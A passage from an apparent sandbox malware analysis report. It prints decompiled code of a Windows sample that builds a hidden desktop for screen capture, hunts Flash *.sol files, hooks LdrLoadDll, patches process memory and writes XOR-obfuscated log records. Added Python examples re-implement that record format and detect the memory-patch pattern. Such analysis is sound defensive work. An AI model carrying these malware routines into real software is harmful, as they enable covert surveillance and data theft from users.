    					PathCombineW( &_v528,  &_v528, L"Macromedia\\Flash Player"); // %APPDATA%\Macromedia\Flash Player, where Flash Local Shared Objects (*.sol) are kept
    					if(_a4 == 0) {
    						_t8 = E004154D1(_t14, _t15,  &_v528);
    					} else {
    						_t14 =  &_v528;
    						_t8 = E0040C174( &_v528, L"*.sol"); // enumerate *.sol under that folder (E0040C174: FindFirstFileW/PathMatchSpecW/FindNextFileW walk, see the subcall list)
    					}
    				}
    				if(_a4 != 0) {
    					return _t8;
    				} else {
    					return E004050A3(_t14, 0, 2, 0);
    				}
    			}

    Instruction address column: 0x004055d1 - 0x00405623

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,00000000,00000000), ref: 004055D1
    • PathCombineW.SHLWAPI(?,?,Macromedia\Flash Player), ref: 004055E8
      • Part of subcall function 0040C174: PathCombineW.SHLWAPI(?,?,00401058,00000000,00000000,00000000), ref: 0040C197
      • Part of subcall function 0040C174: FindFirstFileW.KERNEL32(?,?), ref: 0040C1AA
      • Part of subcall function 0040C174: PathMatchSpecW.SHLWAPI(?,?), ref: 0040C1F5
      • Part of subcall function 0040C174: PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040C20D
      • Part of subcall function 0040C174: FindNextFileW.KERNEL32(00000000,?,?), ref: 0040C248
      • Part of subcall function 0040C174: FindClose.KERNEL32(00000000), ref: 0040C257
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Path$CombineFind$File$CloseFirstFolderMatchNextSpecSpecial
    • String ID: *.sol$Macromedia\Flash Player
    • API String ID: 304139136-1405511494
    • Opcode ID: c6cb4b04b49955f201d55adbfefb0e5492864ee2075f49904a40336ce694d937
    • Instruction ID: 28b938483968348d9918f5ccfde6b13c7139cd5862718c584add368721c31eec
    • Opcode Fuzzy Hash: c6cb4b04b49955f201d55adbfefb0e5492864ee2075f49904a40336ce694d937
    • Instruction Fuzzy Hash: B9F096F16012087AE710EB61DC89FBB772CC741344F608576B615A60C2DA798D448EAD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00408CE8(void* __eax, char _a4) {
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				void* _v48;
    				char _v52;
    				void* _v56;
    				void* _v84;
    				void* __esi;
    				void* _t28;
    				struct HDC__* _t33;
    				struct HDC__* _t35;
    				intOrPtr _t41;
    				intOrPtr _t42;
    				void* _t47;
    				void* _t48;
    				char _t50;
    				void* _t55;
    
    				_t28 = E00414119(_t48); // opens/creates window station "Winsta0" and desktop "SubCallssEdit7792" and binds this thread to it (see the subcall APIs below): the hidden desktop the capture below runs on
    				_t50 = _a4;
    				if(_t28 != 0) {
    					_t55 =  *0x416ac4(0); // unresolved import, likely GetDC(NULL): the handle feeds the GDI calls below (inferred)
    					if(_t55 != 0) {
    						_t33 =  *0x416e00(_t55); // likely CreateCompatibleDC(hdc); the result is later passed to DeleteDC
    						 *(_t50 + 0x10) = _t33;
    						if(_t33 == 0) {
    							_t47 = _v48;
    						} else {
    							_t41 =  *0x416e10(_t55, 8); // likely GetDeviceCaps(hdc, HORZRES = 8)
    							 *((intOrPtr*)(_t50 + 0x14)) = _t41;
    							_t42 =  *0x416e10(_t55, 0xa); // likely GetDeviceCaps(hdc, VERTRES = 10)
    							 *((intOrPtr*)(_t50 + 0x18)) = _t42;
    							_t47 =  *0x416dfc(_t55,  *((intOrPtr*)(_t50 + 0x14)), _t42); // likely CreateCompatibleBitmap(hdc, width, height): a screen-sized bitmap, selected into the memory DC next
    							if(_t47 != 0) {
    								_v84 = SelectObject( *(_t50 + 0x10), _t47);
    							}
    						}
    						 *0x416acc(0, _t55); // likely ReleaseDC(NULL, hdc)
    						_t68 = _v56;
    						if(_v56 != 0) {
    							_v52 = _t50;
    							_v48 = 0x408889;
    							_v44 = 0x40888c;
    							_v40 = E0040888F;
    							_v36 = E0040890D;
    							_v32 = E00408914;
    							_v28 = E00408AC4;
    							_v24 = 0x408ce7;
    							E00413758(_t68,  *((intOrPtr*)(_t50 + 0xc)),  &_v52,  *((intOrPtr*)(_t50 + 4)));
    						}
    						_t35 =  *(_t50 + 0x10);
    						if(_t35 != 0) {
    							if(_v56 != 0) {
    								SelectObject(_t35, _v56);
    							}
    							DeleteDC( *(_t50 + 0x10));
    							if(_t47 != 0) {
    								DeleteObject(_t47);
    							}
    						}
    					}
    				}
    				E004108F5( *((intOrPtr*)(_t50 + 0xc)));
    				E0040F0C0(_t50);
    				return 0;
    			}

    Instruction address column: 0x00408cf6 - 0x00408e02

    APIs
      • Part of subcall function 00414119: OpenWindowStationW.USER32(Winsta0,00000000,10000000), ref: 00414132
      • Part of subcall function 00414119: CreateWindowStationW.USER32(Winsta0,00000000,10000000,00000000), ref: 00414144
      • Part of subcall function 00414119: GetProcessWindowStation.USER32 ref: 00414156
      • Part of subcall function 00414119: OpenDesktopW.USER32(SubCallssEdit7792,00000000,00000000,10000000), ref: 00414177
      • Part of subcall function 00414119: CreateDesktopW.USER32(SubCallssEdit7792,00000000,00000000,00000000,10000000,00000000), ref: 00414189
      • Part of subcall function 00414119: GetCurrentThreadId.KERNEL32 ref: 00414195
      • Part of subcall function 00414119: GetThreadDesktop.USER32(00000000,?,?), ref: 0041419C
      • Part of subcall function 00414119: SetThreadDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141AE
      • Part of subcall function 00414119: CloseDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141C2
      • Part of subcall function 00414119: CloseWindowStation.USER32(?,?), ref: 004141E2
    • SelectObject.GDI32(?,00000000), ref: 00408D53
    • SelectObject.GDI32(?,00000000), ref: 00408DD2
    • DeleteDC.GDI32(?), ref: 00408DDB
    • DeleteObject.GDI32(?), ref: 00408DE6
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Desktop$StationWindow$ObjectThread$CloseCreateDeleteOpenSelect$CurrentProcess
    • String ID:
    • API String ID: 2578643875-0
    • Opcode ID: 7c8e6d8d55e7c764fea7ef4fd650cb840e2755fbd727cef450d42f5f86268655
    • Instruction ID: b3d1fd2ce2a1bfb911137bcd3b55876657658cdc2a0dda783e25cc8617eca9c3
    • Opcode Fuzzy Hash: 7c8e6d8d55e7c764fea7ef4fd650cb840e2755fbd727cef450d42f5f86268655
    • Instruction Fuzzy Hash: 80314F71204705AFC710AF61DD48A9BBBB8BF54315F04863EF894A26D0CB78D954CFAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00408CEA(void* __ecx, char _a4) {
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				void* _v48;
    				char _v52;
    				void* _v56;
    				void* _v84;
    				void* __esi;
    				void* _t26;
    				struct HDC__* _t31;
    				struct HDC__* _t33;
    				intOrPtr _t39;
    				intOrPtr _t40;
    				void* _t45;
    				char _t48;
    				void* _t53;
    
    				_t26 = E00414119(__ecx);
    				_t48 = _a4;
    				if(_t26 == 0) {
    					L13:
    					E004108F5( *((intOrPtr*)(_t48 + 0xc)));
    					E0040F0C0(_t48);
    					return 0;
    				}
    				_t53 =  *0x416ac4(0);
    				if(_t53 != 0) {
    					_t31 =  *0x416e00(_t53);
    					 *(_t48 + 0x10) = _t31;
    					if(_t31 == 0) {
    						_t45 = _v48;
    					} else {
    						_t39 =  *0x416e10(_t53, 8);
    						 *((intOrPtr*)(_t48 + 0x14)) = _t39;
    						_t40 =  *0x416e10(_t53, 0xa);
    						 *((intOrPtr*)(_t48 + 0x18)) = _t40;
    						_t45 =  *0x416dfc(_t53,  *((intOrPtr*)(_t48 + 0x14)), _t40);
    						if(_t45 != 0) {
    							_v84 = SelectObject( *(_t48 + 0x10), _t45);
    						}
    					}
    					 *0x416acc(0, _t53);
    					_t61 = _v56;
    					if(_v56 != 0) {
    						_v52 = _t48;
    						_v48 = 0x408889;
    						_v44 = 0x40888c;
    						_v40 = E0040888F;
    						_v36 = E0040890D;
    						_v32 = E00408914;
    						_v28 = E00408AC4;
    						_v24 = 0x408ce7;
    						E00413758(_t61,  *((intOrPtr*)(_t48 + 0xc)),  &_v52,  *((intOrPtr*)(_t48 + 4)));
    					}
    					_t33 =  *(_t48 + 0x10);
    					if(_t33 != 0) {
    						if(_v56 != 0) {
    							SelectObject(_t33, _v56);
    						}
    						DeleteDC( *(_t48 + 0x10));
    						if(_t45 != 0) {
    							DeleteObject(_t45);
    						}
    					}
    				}
    			}

    Instruction address column: 0x00408cf6 - 0x00408e02

    APIs
      • Part of subcall function 00414119: OpenWindowStationW.USER32(Winsta0,00000000,10000000), ref: 00414132
      • Part of subcall function 00414119: CreateWindowStationW.USER32(Winsta0,00000000,10000000,00000000), ref: 00414144
      • Part of subcall function 00414119: GetProcessWindowStation.USER32 ref: 00414156
      • Part of subcall function 00414119: OpenDesktopW.USER32(SubCallssEdit7792,00000000,00000000,10000000), ref: 00414177
      • Part of subcall function 00414119: CreateDesktopW.USER32(SubCallssEdit7792,00000000,00000000,00000000,10000000,00000000), ref: 00414189
      • Part of subcall function 00414119: GetCurrentThreadId.KERNEL32 ref: 00414195
      • Part of subcall function 00414119: GetThreadDesktop.USER32(00000000,?,?), ref: 0041419C
      • Part of subcall function 00414119: SetThreadDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141AE
      • Part of subcall function 00414119: CloseDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141C2
      • Part of subcall function 00414119: CloseWindowStation.USER32(?,?), ref: 004141E2
    • SelectObject.GDI32(?,00000000), ref: 00408D53
    • SelectObject.GDI32(?,00000000), ref: 00408DD2
    • DeleteDC.GDI32(?), ref: 00408DDB
    • DeleteObject.GDI32(?), ref: 00408DE6
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Desktop$StationWindow$ObjectThread$CloseCreateDeleteOpenSelect$CurrentProcess
    • String ID:
    • API String ID: 2578643875-0
    • Opcode ID: 13cb8732f482e92080d71640bc5d5e170680625adb5618aa74043ece38bbb537
    • Instruction ID: 129632a8a268434fe8942854e1cb099b8aefa11e76e8ac37a1e310d40adf2951
    • Opcode Fuzzy Hash: 13cb8732f482e92080d71640bc5d5e170680625adb5618aa74043ece38bbb537
    • Instruction Fuzzy Hash: A8315C71204705AFC710AF61D948A9BBBB8BF54315F04863EF994A26D0CB78D854CFAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00414843(signed int __edx, long __edi, void** __esi, void* _a4) {
    				char _v5;
    				long _v12;
    				void _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t22;
    				signed int _t25;
    				signed int _t41;
    				void** _t43;
    
    				_t43 = __esi;
    				_t41 = __edx;
    				_v5 = 0;
    				if(__edi <= 0xa00000) { // payload length capped at 0xa00000 (10 MiB)
    					_t22 = E0040FF8F( *__esi);
    					_v36 = _t22;
    					_v32 = _t41;
    					if((_t22 & _t41) != 0xffffffff && E0040FF6F( *__esi, 0, 0, 2) != 0) {
    						_t25 = E0040FF8F( *__esi);
    						_v28 = _t25;
    						_v24 = _t41;
    						if((_t25 & _t41) != 0xffffffff) {
    							E0040F173( &_v20,  &_v20, 0, 5); // zero the 5-byte record header (memset-like helper)
    							_v20 = __esi[4] ^ __edi; // header DWORD = payload length XOR the key stored at +0x10 of the file object
    							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, __edi,  &_v12, 0) == 0 || _v12 != __edi) { // header, then payload; any short write takes the rollback path
    								E0040FF6F( *_t43, _v28, _v24, 0); // seek back to where the record started ...
    								SetEndOfFile( *_t43); // ... and cut the partial record off
    							} else {
    								_v5 = 1;
    							}
    						}
    						FlushFileBuffers( *_t43);
    						E0040FF6F( *_t43, _v36, _v32, 0);
    					}
    				}
    				return _v5;
    			}

    Instruction address column: 0x00414843 - 0x0041491c

    APIs
      • Part of subcall function 0040FF8F: SetFilePointerEx.KERNEL32(?,00000000,00000000,bHA,00000001,00414862,?,00000000,?,?,025DF908,00000008,00000000,00000000,00000000,00000000), ref: 0040FFA4
      • Part of subcall function 0040FF6F: SetFilePointerEx.KERNEL32(00000004,00000004,00000004,00000000,00000002,00414819,?,00000000,00000000,00000000), ref: 0040FF81
    • WriteFile.KERNEL32(?,00000000,00000005,00000000,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000), ref: 004148BB
    • WriteFile.KERNEL32(?,00000005,00000000,00000005,00000000,?,?,025DF908,00000008,00000000,00000000), ref: 004148D6
    • SetEndOfFile.KERNEL32(?,?,025DF908,00000008,00000000,?,?,025DF908,00000008,00000000,00000000,00000000,00000000), ref: 004148FB
    • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,?,?,025DF908,00000008,00000000,00000000,00000000,00000000), ref: 00414903
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$PointerWrite$BuffersFlush
    • String ID:
    • API String ID: 1289656144-0
    • Opcode ID: 8741bb120fa16adb0cecb998d26c48a7cc4e84cb754a9c8a4e1c0c4f88310b3c
    • Instruction ID: b25f87ce16402d26419eab2f474273d6bdb16962440f5cd0a3c9273388d2de79
    • Opcode Fuzzy Hash: 8741bb120fa16adb0cecb998d26c48a7cc4e84cb754a9c8a4e1c0c4f88310b3c
    • Instruction Fuzzy Hash: 08217C75900109EFDF21AFA4CC85AEFBBB9BF48344F10443AF190B11A0D73A8995DB24
    Uniqueness

    Uniqueness Score: -1.00%
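
Worked example (added here; not the report's or the sample's code): a Python writer and reader for the record format E00414843 produces, useful when parsing the files the sample appends to. Everything about the layout is read off the listing: the function refuses payloads larger than 0xa00000, seeks to end of file, zero-fills a 5-byte header, stores (length XOR key) in its first DWORD, writes header then payload, and on any short write seeks back to where the record started and calls SetEndOfFile so a partial record never survives; FlushFileBuffers and a seek back to the original position follow either way. The key is the DWORD at +0x10 of the caller's file object (__esi[4]); its origin is not visible in this function, so the example takes it as a parameter. The fifth header byte is left at zero and not interpreted. The in-memory file and the FailAfter helper are constructed for the demonstration.

```python
"""Writer/reader for the record format produced by E00414843 (added example).

Layout read off the listing: 5-byte zero-filled header whose first DWORD is
(length XOR key), followed by `length` payload bytes. `key` is the DWORD at
+0x10 of the caller's file object (__esi[4]); where it comes from is not
visible in that function, so it is a parameter here. The fifth header byte
is written as 0 and not interpreted."""
import io
import struct

MAX_RECORD = 0xA00000        # `if(__edi <= 0xa00000)`: 10 MiB cap
HEADER_LEN = 5


def append_record(fh, key: int, data: bytes) -> bool:
    """Append one record at end of file, restoring the caller's file position.

    Mirrors the control flow of E00414843: on a short write the record is cut
    off (seek back + truncate, the SetEndOfFile path); FlushFileBuffers and
    the seek back to the original offset happen in every case.
    """
    if len(data) > MAX_RECORD:
        return False
    start = fh.tell()
    fh.seek(0, io.SEEK_END)
    rec_off = fh.tell()
    header = struct.pack("<I", (len(data) ^ key) & 0xFFFFFFFF) + b"\x00"
    ok = False
    try:
        if fh.write(header) == HEADER_LEN and fh.write(data) == len(data):
            ok = True
    finally:
        if not ok:
            fh.seek(rec_off)
            fh.truncate()
        fh.flush()
        fh.seek(start)
    return ok


def iter_records(blob: bytes, key: int):
    """Yield payloads from a file written with append_record.

    Stops at the first header whose decoded length exceeds MAX_RECORD or
    runs past the end of the blob (a wrong key usually fails this way).
    """
    off = 0
    while off + HEADER_LEN <= len(blob):
        (obf,) = struct.unpack_from("<I", blob, off)
        length = (obf ^ key) & 0xFFFFFFFF
        off += HEADER_LEN
        if length > MAX_RECORD or off + length > len(blob):
            break
        yield blob[off:off + length]
        off += length


class FailAfter(io.BytesIO):
    """Constructed in-memory file that refuses any write that would take it
    past `limit` bytes, to exercise the rollback path."""

    def __init__(self, limit: int):
        super().__init__()
        self.limit = limit

    def write(self, b):
        if self.tell() + len(b) > self.limit:
            return 0
        return super().write(b)


def write_all(key: int, payloads) -> tuple:
    """Append each payload to a fresh in-memory file; return the per-record
    success flags and the records a reader recovers with the same key."""
    fh = io.BytesIO()
    flags = [append_record(fh, key, p) for p in payloads]
    return flags, list(iter_records(fh.getvalue(), key))


def rollback_demo() -> tuple:
    """Second record hits the simulated write failure and must vanish."""
    fh = FailAfter(limit=20)
    first = append_record(fh, 7, b"12345")              # 5 + 5 bytes, fits
    second = append_record(fh, 7, b"0123456789abcdef")  # 5 + 16 bytes, fails
    return first, second, len(fh.getvalue()), list(iter_records(fh.getvalue(), 7))
```

For a file recovered from disk, pass its bytes and the recovered key to iter_records; an empty result on a file that clearly has content usually means the wrong key.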

    APIs
    • WaitForSingleObject.KERNEL32(0100007F,00000000), ref: 00410758
    • recv.WS2_32(?,?,00000400,00000000), ref: 0041079C
    • send.WS2_32(?,?,00000000,00000000), ref: 004107B5
    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004107F4
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ObjectSingleWaitrecvselectsend
    • String ID:
    • API String ID: 4176622587-0
    • Opcode ID: 948e814f7f0162042123225db5f487293ab21045863ebbbd06a653ddea7ee5ff
    • Instruction ID: b2732716ba659e2a1a3da2628498ae1fb1a29879da45472d50e90d4a284b4380
    • Opcode Fuzzy Hash: 948e814f7f0162042123225db5f487293ab21045863ebbbd06a653ddea7ee5ff
    • Instruction Fuzzy Hash: 572137756013289FDB20AF64DC88AEE7BA8FF45354F200056F92992290D3B499C0CFA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040727B(void* __edi, void* _a4) {
    				long _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				int _t22;
    				void* _t24;
    
    				_t24 =  *0x416bbc; // 0xffffffff, the GetCurrentProcess() pseudo-handle: in this run the target was the sample's own process
    				_t22 = 0;
    				// skip PAGE_NOACCESS (1) and PAGE_GUARD (0x100) regions, then make the 4 target bytes PAGE_EXECUTE_READWRITE (0x40), write them and put the old protection back
    				if(VirtualQueryEx(_t24, __edi,  &_v36, 0x1c) != 0 && _v36.Protect != 1 && (_v36.Protect & 0x00000100) == 0 && _v36.RegionSize != 0 && VirtualProtectEx(_t24, __edi, 4, 0x40,  &_v8) != 0) {
    					_t22 = WriteProcessMemory(_t24, __edi, _a4, 4, 0);
    					VirtualProtectEx(_t24, __edi, 4, _v8,  &_v8);
    				}
    				return 0 | _t22 != 0x00000000;
    			}

    Instruction address column: 0x00407283 - 0x004072f0

    APIs
    • VirtualQueryEx.KERNEL32(FFFFFFFF,?,?,0000001C,00000000,00000000), ref: 00407293
    • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000040,00000000), ref: 004072BB
    • WriteProcessMemory.KERNEL32(FFFFFFFF,?,?,00000004,00000000), ref: 004072CD
    • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000000,00000000), ref: 004072E0
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Virtual$Protect$MemoryProcessQueryWrite
    • String ID:
    • API String ID: 2789181485-0
    • Opcode ID: 17aedc08de5f883db2d2c5ad70e8728a234c94fcca49cf4a6b4c33c16431302a
    • Instruction ID: 9ef884a152b7479fc312cdca4dc7e8f6a3517c135598039bd1538e22fd406e92
    • Opcode Fuzzy Hash: 17aedc08de5f883db2d2c5ad70e8728a234c94fcca49cf4a6b4c33c16431302a
    • Instruction Fuzzy Hash: 51011A71A04218BBEB218B919C49FEF777CAB59718F01807AF601B5180D778EA048BAD
    Uniqueness

    Uniqueness Score: -1.00%
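
Worked example (added here; not the report's or the sample's code): a small Python detector that parses API-call lines in the format this report uses and flags the write primitive E0040727B implements, i.e. VirtualProtectEx to PAGE_EXECUTE_READWRITE (0x40), WriteProcessMemory of the same size at the same address on the same process handle, then a second VirtualProtectEx restoring the old protection. region_is_patchable() encodes the VirtualQueryEx filter from the listing (reject PAGE_NOACCESS = 1, any PAGE_GUARD = 0x100 region, and empty regions). The first four sample lines are the ones listed above for this function; the fifth is a constructed benign call. One caveat when reading the listing: FFFFFFFF is the GetCurrentProcess() pseudo-handle, so in this run the patch landed in the sample's own address space; with a handle from OpenProcess the same four calls patch a foreign process, which is what the detector is after.

```python
"""Detector for the 4-byte remote-patch primitive in E0040727B (added example).

Parses API-call lines in this report's own format, e.g.
  VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000040,00000000), ref: 004072BB
and flags VirtualProtectEx(0x40) -> WriteProcessMemory -> VirtualProtectEx
(restore) on one process handle."""
import re

PAGE_NOACCESS = 0x01
PAGE_GUARD = 0x100
PAGE_EXECUTE_READWRITE = 0x40
CURRENT_PROCESS_PSEUDO_HANDLE = 0xFFFFFFFF   # what GetCurrentProcess() returns

_CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)"
)

SAMPLE_LINES = [
    # the four calls listed for E0040727B in this report
    "• VirtualQueryEx.KERNEL32(FFFFFFFF,?,?,0000001C,00000000,00000000), ref: 00407293",
    "• VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000040,00000000), ref: 004072BB",
    "• WriteProcessMemory.KERNEL32(FFFFFFFF,?,?,00000004,00000000), ref: 004072CD",
    "• VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000000,00000000), ref: 004072E0",
    # constructed benign line: a read-only remap with no write following it
    "• VirtualProtectEx.KERNEL32(00000ABC,?,00001000,00000002,00000000), ref: 00401000",
]


def region_is_patchable(protect: int, region_size: int) -> bool:
    """The VirtualQueryEx filter from the listing: the sample only patches
    non-empty regions that are neither PAGE_NOACCESS nor guard pages."""
    return (protect != PAGE_NOACCESS
            and not (protect & PAGE_GUARD)
            and region_size != 0)


def parse_call(line: str):
    """Split one 'Api.MODULE(args), ref: RVA' line; '?' becomes None and
    plain hex tokens become ints (a short all-hex string argument would be
    misread as a number, which is acceptable for this purpose)."""
    m = _CALL_RE.search(line)
    if not m:
        return None
    args = []
    for tok in (m.group("args") or "").split(","):
        tok = tok.strip()
        if tok == "":
            continue
        if tok == "?":
            args.append(None)
        elif re.fullmatch(r"[0-9A-Fa-f]{1,8}", tok):
            args.append(int(tok, 16))
        else:
            args.append(tok)
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": m.group("ref")}


def _same(a, b) -> bool:
    """Argument equality with '?' (None) as a wildcard."""
    return a is None or b is None or a == b


def find_patch_sequences(lines) -> list:
    """Return one finding per VirtualProtectEx(...,0x40) that is followed by a
    WriteProcessMemory on the same handle/address/size, noting whether the
    old protection was put back afterwards."""
    calls = [c for c in map(parse_call, lines) if c]
    findings = []
    for i, c in enumerate(calls):
        if c["api"] != "VirtualProtectEx" or len(c["args"]) < 4:
            continue
        handle, addr, size, prot = c["args"][:4]
        if prot != PAGE_EXECUTE_READWRITE:
            continue
        j = next((k for k in range(i + 1, len(calls))
                  if calls[k]["api"] == "WriteProcessMemory"
                  and len(calls[k]["args"]) >= 4
                  and _same(calls[k]["args"][0], handle)
                  and _same(calls[k]["args"][1], addr)
                  and _same(calls[k]["args"][3], size)), None)
        if j is None:
            continue
        restored = any(r["api"] == "VirtualProtectEx" and len(r["args"]) >= 4
                       and r["args"][0] == handle
                       and r["args"][3] != PAGE_EXECUTE_READWRITE
                       for r in calls[j + 1:])
        findings.append({
            "handle": handle,
            "size": size,
            "write_ref": calls[j]["ref"],
            "restored": restored,
            "self_process": handle == CURRENT_PROCESS_PSEUDO_HANDLE,
        })
    return findings
```

Feed find_patch_sequences the API lines of any function in this report; a finding with self_process False is the foreign-process case, and a finding with restored False means the target page was left executable and writable.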

    C-Code - Quality: 37%
    			E00405BD4(void* __edx, WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
    				long _t17;
    				void* _t19;
    				void* _t20;
    				HMODULE* _t22;
    
    				_t19 = __edx;
    				_t22 = _a16;
    				_t20 =  *0x416cf0(_a4, _a8, _a12, _t22); // LdrGetDllHandle, ref 00405BE7: a non-zero status means the DLL was not resident yet
    				_t17 = LdrLoadDll(_a4, _a8, _a12, _t22); // the real load; this wrapper takes LdrLoadDll's own parameter list (hook/trampoline pattern, inferred)
    				if(_t17 == 0 && _t20 != 0 &&  *( *_t22) == 0x5a4d) { // load succeeded, the module is new, and its base starts with "MZ"
    					 *0x416fe8(0x41677c); // RtlEnterCriticalSection, ref 00405C1B
    					E00407518(0x4164a0, 0x5a4d, _t19,  *_t22, 0xffffffff); // processes the freshly loaded module (base in *_t22)
    					 *0x416fec(0x41677c); // RtlLeaveCriticalSection, ref 00405C30
    					E0040493A();
    				}
    				return _t17;
    			}

    Instruction address column: 0x00405bd4 - 0x00405c41

    APIs
    • LdrGetDllHandle.NTDLL(?,?,?,?), ref: 00405BE7
    • LdrLoadDll.NTDLL(?,?,?,?), ref: 00405BF9
    • RtlEnterCriticalSection.NTDLL(0041677C), ref: 00405C1B
    • RtlLeaveCriticalSection.NTDLL(0041677C), ref: 00405C30
      • Part of subcall function 0040493A: GetModuleHandleA.KERNEL32(00416514), ref: 00404976
      • Part of subcall function 0040493A: GetProcAddress.KERNELBASE(?,?), ref: 0040499B
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalHandleSection$AddressEnterLeaveLoadModuleProc
    • String ID:
    • API String ID: 915114488-0
    • Opcode ID: c06f461430afaaa177753215952a9555f7f7eb03502fbbeed47ecb867c58fa61
    • Instruction ID: 558d5bac78e13009a6f2e0b45e89711926aa9bb97a532c02b3541544237d1897
    • Opcode Fuzzy Hash: c06f461430afaaa177753215952a9555f7f7eb03502fbbeed47ecb867c58fa61
    • Instruction Fuzzy Hash: 04F06D36204208BBDB112F55DC848AB3F69EB89329712813AFA15532A0DB36CC119BA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0040CE72(void* __edx, intOrPtr _a4, char _a7, intOrPtr _a8, intOrPtr* _a12, signed int* _a16) {
    				signed int _v5;
    				char _v6;
    				unsigned int _v12;
    				signed int _v16;
    				unsigned int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				char _v52;
    				char _v68;
    				char _v84;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed short _t140;
    				signed int _t146;
    				signed short _t147;
    				signed short _t148;
    				signed int _t149;
    				signed short _t151;
    				signed char _t152;
    				signed int _t153;
    				signed int _t157;
    				void* _t159;
    				signed char _t163;
    				unsigned int _t164;
    				intOrPtr _t167;
    				intOrPtr _t168;
    				signed int _t169;
    				signed int _t171;
    				signed int _t173;
    				signed int _t176;
    				signed int _t180;
    				void* _t191;
    				signed int _t192;
    				signed int _t196;
    				void* _t198;
    				intOrPtr _t202;
    				signed int _t208;
    				signed int _t210;
    				signed int _t212;
    				void* _t219;
    				signed int _t220;
    				void* _t223;
    				intOrPtr* _t224;
    				char* _t239;
    				signed int _t246;
    				void* _t250;
    				intOrPtr _t255;
    				signed int _t256;
    				signed int _t261;
    				signed int* _t262;
    				signed int _t263;
    				signed int _t264;
    				char* _t266;
    				signed int _t269;
    				intOrPtr* _t271;
    				signed int _t273;
    				void* _t274;
    				void* _t275;
    
    				_t255 = _a8;
    				if( *((intOrPtr*)(_t255 + 0x42c)) < 8) {
    					return 0;
    				}
    				_v16 = _v16 & 0x00000000;
    				_t269 = E00414398( &_v16, __edx, __eflags, _a4, 0x4e2a, 0x20000000);
    				_v32 = _t269;
    				_v6 = 0;
    				__eflags = _t269;
    				if(_t269 == 0) {
    					L73:
    					E0040F0C0(_v32);
    					return _v6;
    				} else {
    					__eflags = _v16 - 0x10;
    					if(_v16 <= 0x10) {
    						goto L73;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						__eflags = ( *_t269 & 0x0000ffff) - _v32 + _t269 - _v16;
    						if(( *_t269 & 0x0000ffff) - _v32 + _t269 > _v16) {
    							goto L73;
    						}
    						_t140 =  *(_t269 + 8) & 0x0000ffff;
    						__eflags = _t140;
    						if(_t140 == 0) {
    							L13:
    							_t269 = _t269 + ( *_t269 & 0x0000ffff);
    							__eflags = _t269 - _v32 + 0x10 - _v16;
    							if(_t269 - _v32 + 0x10 < _v16) {
    								continue;
    							}
    							goto L73;
    						}
    						_v12 = (_t140 & 0x0000ffff) + _t269;
    						_v24 = E0040F521((_t140 & 0x0000ffff) + _t269);
    						_t146 = E0040AD1B((_t140 & 0x0000ffff) + _t269, _t145, _t255,  *((intOrPtr*)(_t255 + 0x400)), 0, 0, 0);
    						__eflags = _t146;
    						if(_t146 == 0) {
    							goto L13;
    						}
    						_t147 =  *(_t269 + 0xa) & 0x0000ffff;
    						__eflags = _t147;
    						if(_t147 == 0) {
    							L9:
    							_t148 =  *(_t269 + 0xc) & 0x0000ffff;
    							__eflags = _t148;
    							if(_t148 == 0) {
    								L15:
    								__eflags =  *((char*)(_t269 + 6)) - 9;
    								if( *((char*)(_t269 + 6)) > 9) {
